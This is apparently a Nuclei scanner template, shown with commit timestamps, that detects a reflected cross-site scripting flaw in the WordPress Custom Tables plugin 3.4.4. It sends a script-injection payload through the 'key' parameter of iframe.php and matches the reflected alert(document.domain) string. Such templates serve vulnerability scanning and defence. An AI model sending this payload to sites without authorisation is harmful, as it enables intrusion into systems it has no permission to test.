nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml

31 lines
838 B
YAML
Raw Normal View History

2021-07-14 23:21:50 +00:00
id: wp-custom-tables-xss
info:
name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
2021-07-15 09:04:40 +00:00
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
2021-09-12 09:50:53 +00:00
reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
2021-07-14 23:21:50 +00:00
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
2021-07-19 06:08:50 +00:00
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-14 23:21:50 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 06:08:50 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-14 23:21:50 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200